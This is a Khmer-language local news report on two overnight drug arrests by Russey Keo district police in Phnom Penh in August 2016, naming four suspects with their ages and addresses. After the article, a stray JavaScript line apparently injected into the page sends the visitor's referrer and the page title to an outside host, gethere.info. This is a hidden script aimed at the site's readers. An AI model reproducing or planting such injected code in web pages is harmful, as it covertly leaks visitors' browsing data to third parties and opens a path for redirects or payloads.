ម្នាក់ទៀតហើយពាក់ព័ន្ធករណីគ្រឿងញៀន​ ក្នុងរំលងអាធ្រាតសមត្ថកិច្ចខណ្ឌឬស្សកែវបង្ក្រាប

ភ្នំពេញ៖ មនុស្ស០១នាក់ទៀតហើយពាក់ព័ន្ធនិងករណីគ្រឿងញៀន ត្រូវបានសមត្ថកិច្ចខណ្ឌរឬស្សីកែវបង្ក្រាបឃាត់ខ្លួន។ នោះពិតជាមានប្រសិទ្ធិភាពមែនចំពោះ វិធានការល្បាតចំហរ និងបញ្ចុះកម្លាំងតាមបណ្តាគោលដៅពួនស្ទាក់ទាំង៦សង្កាត់ នៃខណ្ឌឬស្សីកែវ។

ជាក់ស្តែងជាការកត់សំគាល់ការបង្ក្រាបបាន២ករណីជាប់គ្នាក្នុងយប់និងរំលងអាធ្រាតថ្ងៃទី១០ និង១១សីហា កណ្តាលយប់កណ្តាលអាធ្រាត វិធានការត្រួតពិនិត្យមធ្យោបាយ និងសមាសភាពសង្ស័យរបស់កម្លាំងនគរបាលខណ្ឌឬស្សីកែវ ជាលទ្ធផល គួរកត់សំគាល់ ក្រៅពីល្បាតទប់ស្កាត់បទល្មើសព្រហ្មទណ្ឌ ត្រូវបានរកឃើញដោយលទ្ធផល សមាសភាពរក្សារទុកនិងជួញដូរគ្រឿងញៀនចំនួន២ករណីផ្សេងគ្នា។

ករណីទី១៖ដកហូតថ្នាំញៀន២១កញ្ចប់ធំតូច ឃាត់បានមនុស្ស៣នាក់កាលវេលាម៉ោង៨និង១០នាទីយប់ ថ្ងៃទី១០ ខែសីហា ឆ្នាំ២០១៦ ដែលស្ថិតនៅក្នុងតំបន់ ស្មុគស្មាញក្នងភូមិលូរ ក្រុម១៤ សង្កាត់ស្វាយប៉ាក ដែលមានឈ្មោះ ថាច់ ភារម្យ ភេទប្រុសអាយុ២១ឆ្នាំ មុខរបរកម្មករ ទីលំនៅ ផ្ទះ៥៣៥ក្រុមទី៣ភូមិឡកំបោរ សង្កាត់ស្វាយប៉ាក។ ទី២ឈ្មោះ ប៊ន ច័ន្ទណាវី ភេទស្រីអាយុឋ២៧ឆ្នាំ មុខរបរមិនពិតប្រាកដ ទីលំនៅស្នាក់នៅ ភូមិលូ សង្កាត់ស្វាយប៉ាក និងទិ៣ឈ្មោះ ឡេ ស៊ីឡុង ភេទប្រុសអាយុ១៩ឆ្នាំ មុខរបរមិនពិតប្រាកដមុខសញ្ញាចាស់ធ្លាប់ជាប់ពន្ធនាគារ ( ជួញដូរ) ។

ករណីទី២៖ដកហូតថ្នាំញៀនចំនួន០២កញ្ចប់ធំមួយតូចមួយ ឃាត់បានមនុស្ស០១នាក់ កាលវេលាម៉ោង១និង៤០នាទីរំលង អា ធ្រាត ថ្ងៃទី១១ ខែសីហា ឆ្នាំ២០១៦ ដែលស្ថិតនៅចំណុចក្រោយសាលា ពញាក្រែក ផ្លូវ៩៣ ក្រុម១៨ ភូមិទួលសង្កែ សង្កាត់ទួលសង្កែ ខណ្ឌឬស្សីកែវ។ ជនសង្ស័យម្នាក់នេះមានឈ្មោះ ភាព ផា ភេទប្រុស អាយុ១៩ឆ្នាំ មានទីលំនៅភូមិទម្លាប់ ឃុំសោម ស្រុកគីរីវង្ស ខេត្តតាកែវ។

បច្ចុប្បន្នជនសង្ស័យពាក់ព័ន្ធនិងករណីខាងលើត្រូវបានកំលាំងជំនាញអធិការដ្ឋានឬស្សីកែវខណ្ឌ កំពុងកសាងសំណុំរឿងបន្តចាត់ការទៅតាមនីតិវធី។

6d605947-f8d2-42d8-887f-6cab461c32cc 1907eb05-1074-447b-9fc8-b5e522f765f9 fd8a85af-b341-4668-abf0-4858cfcdb36fimages.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More